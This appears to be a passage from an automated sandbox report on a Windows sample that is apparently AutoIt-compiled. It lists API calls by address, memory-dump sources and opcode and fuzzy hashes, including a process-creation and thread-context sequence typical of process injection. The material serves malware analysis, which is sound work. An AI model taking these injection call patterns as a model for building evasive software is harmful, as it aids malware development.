                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00AC9B82
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00AC9B99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A803D3
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A803DB
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A803E6
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A803F1
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A803F9
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A80401
                                                        • Part of subcall function 00A76259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A6FA90), ref: 00A762B4
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A6FB2D
                                                      • OleInitialize.OLE32(00000000), ref: 00A6FBAA
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AA49F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A64401
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A644A6
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A644C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00A85963
                                                        • Part of subcall function 00A8A3AB: __NMSG_WRITE.LIBCMT ref: 00A8A3D2
                                                        • Part of subcall function 00A8A3AB: __NMSG_WRITE.LIBCMT ref: 00A8A3DC
                                                      • __NMSG_WRITE.LIBCMT ref: 00A8596A
                                                        • Part of subcall function 00A8A408: GetModuleFileNameW.KERNEL32(00000000,00B243BA,00000104,?,00000001,00000000), ref: 00A8A49A
                                                        • Part of subcall function 00A8A408: ___crtMessageBoxW.LIBCMT ref: 00A8A548
                                                        • Part of subcall function 00A832DF: ___crtCorExitProcess.LIBCMT ref: 00A832E5
                                                        • Part of subcall function 00A832DF: ExitProcess.KERNEL32 ref: 00A832EE
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      • RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000000,?,?,?,00A81013,?), ref: 00A8598F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00AC97D2,?,?,?,?,?,00000004), ref: 00AC9B45
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00AC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00AC9B5B
                                                      • CloseHandle.KERNEL32(00000000,?,00AC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AC9B62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      APIs
                                                      • _free.LIBCMT ref: 00AC8FA5
                                                        • Part of subcall function 00A82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A89C64), ref: 00A82FA9
                                                        • Part of subcall function 00A82F95: GetLastError.KERNEL32(00000000,?,00A89C64), ref: 00A82FBB
                                                      • _free.LIBCMT ref: 00AC8FB6
                                                      • _free.LIBCMT ref: 00AC8FC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: be0d8fc2fd5bc0703620be1e72a0847cdb316cb83dd12fac1bfb103c7a084f82
                                                      • Instruction ID: cf9fb26f4381a788ad2ccd0fe39d2877bbe16c89ddb429854752413f25a42be7
                                                      • Opcode Fuzzy Hash: be0d8fc2fd5bc0703620be1e72a0847cdb316cb83dd12fac1bfb103c7a084f82
                                                      • Instruction Fuzzy Hash: F4224874608241CFCB24DF14C990B6ABBF1BF95304F15895DE89A9B362DB31ED85CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: f4f2aec3746f89302e5e0645933a11aebd45e35e704b65806b653a5743fd021c
                                                      • Instruction ID: 22814892176c1ead854c3bec770f9423df8a597ccf4f3ace26761767bae622f1
                                                      • Opcode Fuzzy Hash: f4f2aec3746f89302e5e0645933a11aebd45e35e704b65806b653a5743fd021c
                                                      • Instruction Fuzzy Hash: 05413A71E04558AFDF219B64C9617FF7FB6AF49300F684075F8829B282C6269D8487E1
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00A64992
                                                        • Part of subcall function 00A835AC: __lock.LIBCMT ref: 00A835B2
                                                        • Part of subcall function 00A835AC: DecodePointer.KERNEL32(00000001,?,00A649A7,00AB81BC), ref: 00A835BE
                                                        • Part of subcall function 00A835AC: EncodePointer.KERNEL32(?,?,00A649A7,00AB81BC), ref: 00A835C9
                                                        • Part of subcall function 00A64A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A64A73
                                                        • Part of subcall function 00A64A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A64A88
                                                        • Part of subcall function 00A63B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A63B7A
                                                        • Part of subcall function 00A63B4C: IsDebuggerPresent.KERNEL32 ref: 00A63B8C
                                                        • Part of subcall function 00A63B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B262F8,00B262E0,?,?), ref: 00A63BFD
                                                        • Part of subcall function 00A63B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00A63C81
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A649D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: e52e8ffb0dcb4aacc2478f5e5c0253e423c1a1de1302c2a695c97429b55dd3b8
                                                      • Instruction ID: 01c9eef5c7bbc5064cf24ea82c469348e9a7982d80e98b28763f77238759850a
                                                      • Opcode Fuzzy Hash: e52e8ffb0dcb4aacc2478f5e5c0253e423c1a1de1302c2a695c97429b55dd3b8
                                                      • Instruction Fuzzy Hash: 20118972908351AFC710EF68ED4590ABBF8EB98750F00891EF095872A1DB709A46CB96
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00A65981,?,?,?,?), ref: 00A65E27
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00A65981,?,?,?,?), ref: 00A9E19C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 38a246b27ac8acffdb20123fa3e417657899c11756b20529b3267fe485db3896
                                                      • Instruction ID: cfc5293e6be6c6567844e0947d95d34d5caf1a8f817aa07d053f0e8b346680b9
                                                      • Opcode Fuzzy Hash: 38a246b27ac8acffdb20123fa3e417657899c11756b20529b3267fe485db3896
                                                      • Instruction Fuzzy Hash: 1001B170644708BEFB248F24CC8AF663BECEB01768F14C318BAE56A1E0C6B51E458B50
                                                      APIs
                                                        • Part of subcall function 00A8594C: __FF_MSGBANNER.LIBCMT ref: 00A85963
                                                        • Part of subcall function 00A8594C: __NMSG_WRITE.LIBCMT ref: 00A8596A
                                                        • Part of subcall function 00A8594C: RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000000,?,?,?,00A81013,?), ref: 00A8598F
                                                      • std::exception::exception.LIBCMT ref: 00A8102C
                                                      • __CxxThrowException@8.LIBCMT ref: 00A81041
                                                        • Part of subcall function 00A887DB: RaiseException.KERNEL32(?,?,?,00B1BAF8,00000000,?,?,?,?,00A81046,?,00B1BAF8,?,00000001), ref: 00A88830
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: 28788d00d97d40213ff46bff2e6d1eb4ca5477ad87a16cb5d8a6b986dc296548
                                                      • Instruction ID: 66f19ff8f0e57179323d5473dbc4888cfe591a3a36d360fcb530cb1140b125c0
                                                      • Opcode Fuzzy Hash: 28788d00d97d40213ff46bff2e6d1eb4ca5477ad87a16cb5d8a6b986dc296548
                                                      • Instruction Fuzzy Hash: B4F0C23554031DA6CB20BBA8EE05AEF7BBCAF01350F500466FD04A6591EFB1CA8187E5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: 5d374031193e1df0e1b326ab9ddd7c09fc7e83a25b8345161bccf9530135e82d
                                                      • Instruction ID: 293d6b7b1acf7dd4c1a7d2520a561f334b0177892c4222664126739ff312a5fe
                                                      • Opcode Fuzzy Hash: 5d374031193e1df0e1b326ab9ddd7c09fc7e83a25b8345161bccf9530135e82d
                                                      • Instruction Fuzzy Hash: D8014471C00609EBCF22BF798E0599F7B71BF80760F548256BC145A1A1EF358A61EB91
                                                      APIs
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      • __lock_file.LIBCMT ref: 00A8561B
                                                        • Part of subcall function 00A86E4E: __lock.LIBCMT ref: 00A86E71
                                                      • __fclose_nolock.LIBCMT ref: 00A85626
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: a59ad8228751d5e627c0ba868ef4cae7b6d5b7040e769adaf8293f39888c4c0e
                                                      • Instruction ID: f792ce78a2f59126b427c6286af3f29a1ca5e36bf9659e5f33255fb64c97fb3e
                                                      • Opcode Fuzzy Hash: a59ad8228751d5e627c0ba868ef4cae7b6d5b7040e769adaf8293f39888c4c0e
                                                      • Instruction Fuzzy Hash: 8CF0B471C00A049ADB20BF75890676E77E16F40734F998219A814AB1C1EF7C89419B95
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03D81ABB
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D81B51
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D81B73
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                      • Instruction ID: 6ba801917410782e92656b91c5bf9bb8552dc78715aa10f4338841ee2f005aa8
                                                      • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                      • Instruction Fuzzy Hash: 3A12EE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F85CF5A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbc0e56a416862b311fa508754cd2c6e23ecdbea761e39e70a08c465f6ba63ce
                                                      • Instruction ID: 7825cdfe19e53f1cd47ae843f9df86daebf48cc0d20e88624ff325d123baf437
                                                      • Opcode Fuzzy Hash: fbc0e56a416862b311fa508754cd2c6e23ecdbea761e39e70a08c465f6ba63ce
                                                      • Instruction Fuzzy Hash: B2517F35A00604AFCF14EB64CE95FAE77B6AF45750F18C168F90AAB292CB34ED05CB51
                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00A65CF6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 9693e31ca31f205431f6b03bde6444d1c85a0c1bb6bce2ec9256091d1ef3a153
                                                      • Instruction ID: b04f39d4a617d984c3d23d294843aeda9b357a0b0bb89ac402d4fb929489269b
                                                      • Opcode Fuzzy Hash: 9693e31ca31f205431f6b03bde6444d1c85a0c1bb6bce2ec9256091d1ef3a153
                                                      • Instruction Fuzzy Hash: 66313A71A00B0AEFCB18DF6DC884A6DB7B5FF48310F248629E81993750D771A960DB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: c8c2e6bbeafc101452922d73cb5156ab4972e59967e2d0b556e9f4e52f7dc423
                                                      • Instruction ID: 2a4112e25d26ad852e72cb3439fa04100bf9032e44cf6b970660462af5b7e721
                                                      • Opcode Fuzzy Hash: c8c2e6bbeafc101452922d73cb5156ab4972e59967e2d0b556e9f4e52f7dc423
                                                      • Instruction Fuzzy Hash: 2941D474504351CFDB24DF14C984B1ABBF0BF55318F1989ACE8999B762C732E886CB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: cc9c2962c8420d467e190322b828d6d48df0691e42887a61e7c974b902f383b4
                                                      • Instruction ID: f3ea130a90bc4fc9d0aaf24ad8293e153c3537c65dc52406f2b79a5dd73eccf8
                                                      • Opcode Fuzzy Hash: cc9c2962c8420d467e190322b828d6d48df0691e42887a61e7c974b902f383b4
                                                      • Instruction Fuzzy Hash: 0D21AE30A10A08EBDF10DF65E885AAA7FF8FF10350F21856AE485C2012EF7194A08B55
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp
                                                      • String ID:
                                                      • API String ID: 856254489-0
                                                      • Opcode ID: 9405ef9360b7a51ac207f998aea279379797b4187b3ca3c2abdc2c8fea765dc7
                                                      • Instruction ID: b1c45e7a07dc62aecd4c9997451cf8c276f2194722c2b4306f4033bfd9d56a4b
                                                      • Opcode Fuzzy Hash: 9405ef9360b7a51ac207f998aea279379797b4187b3ca3c2abdc2c8fea765dc7
                                                      • Instruction Fuzzy Hash: 6E117272904129EBCF14EBA9DD919EEF778EF55360F108126E851A71D0EB309E05CB90
                                                      APIs
                                                        • Part of subcall function 00A64D13: FreeLibrary.KERNEL32(00000000,?), ref: 00A64D4D
                                                        • Part of subcall function 00A8548B: __wfsopen.LIBCMT ref: 00A85496
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64F6F
                                                        • Part of subcall function 00A64CC8: FreeLibrary.KERNEL32(00000000), ref: 00A64D02
                                                        • Part of subcall function 00A64DD0: _memmove.LIBCMT ref: 00A64E1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: bbc28cb79dd9747d3a1e68b5db50e289e9d59290a28e3f1fa77e925d7dda062b
                                                      • Instruction ID: 88b344aa5a8509c1e18df31d195e624a3425393f66a971bdfdc4e40ef0a3f607
                                                      • Opcode Fuzzy Hash: bbc28cb79dd9747d3a1e68b5db50e289e9d59290a28e3f1fa77e925d7dda062b
                                                      • Instruction Fuzzy Hash: 7611C131A00709EECB14AF70C902FAE77B9DF48B00F118429F941AA2C1DA719A559BA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: f1a23b546a534a8f6b056cba7a2fbad72957b75b2b8f1e67ae9a45e6e5d53c98
                                                      • Instruction ID: 739947d31fac50f328d5cbc18b6add1a04d686c920cf3a384b91aba961d60523
                                                      • Opcode Fuzzy Hash: f1a23b546a534a8f6b056cba7a2fbad72957b75b2b8f1e67ae9a45e6e5d53c98
                                                      • Instruction Fuzzy Hash: DA210FB4508351CFCB24DF54C884A1ABBF4BF89714F048968E89A5B761D732E849CF52
                                                      APIs
                                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00A65807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A65D76
                                                      Memory Dump Source
